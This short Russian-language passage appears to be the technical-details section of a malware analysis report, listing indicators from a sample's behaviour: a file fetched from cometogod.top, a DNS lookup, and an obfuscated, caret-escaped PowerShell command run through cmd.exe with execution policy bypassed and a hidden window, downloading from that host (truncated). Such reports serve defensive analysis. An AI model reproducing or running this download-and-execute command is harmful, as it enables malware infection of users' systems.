Техническая информация
- http://cometogod.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWersH^Ell^.exE -^e^X^e^Cu^TIOnPoliCY bYP^as^s -NO^Pr^OFI^L^e -W^INdO^wS^TY^l^E ^hIdDEN ^(new^-O^BJECt^ ^SySt^E^M.^n^ET.w^E^Bcli^E^NT).DowNl^O^A^dfILe('http://cometogod.top/s...
- DNS ASK co###ogod.top
- '<SYSTEM32>\cmd.exe' /c "P^OWersH^Ell^.exE -^e^X^e^Cu^TIOnPoliCY bYP^as^s -NO^Pr^OFI^L^e -W^INdO^wS^TY^l^E ^hIdDEN ^(new^-O^BJECt^ ^SySt^E^M.^n^ET.w^E^Bcli^E^NT).DowNl^O^A^dfILe('http://cometogod.top/s...' (со скрытым окном)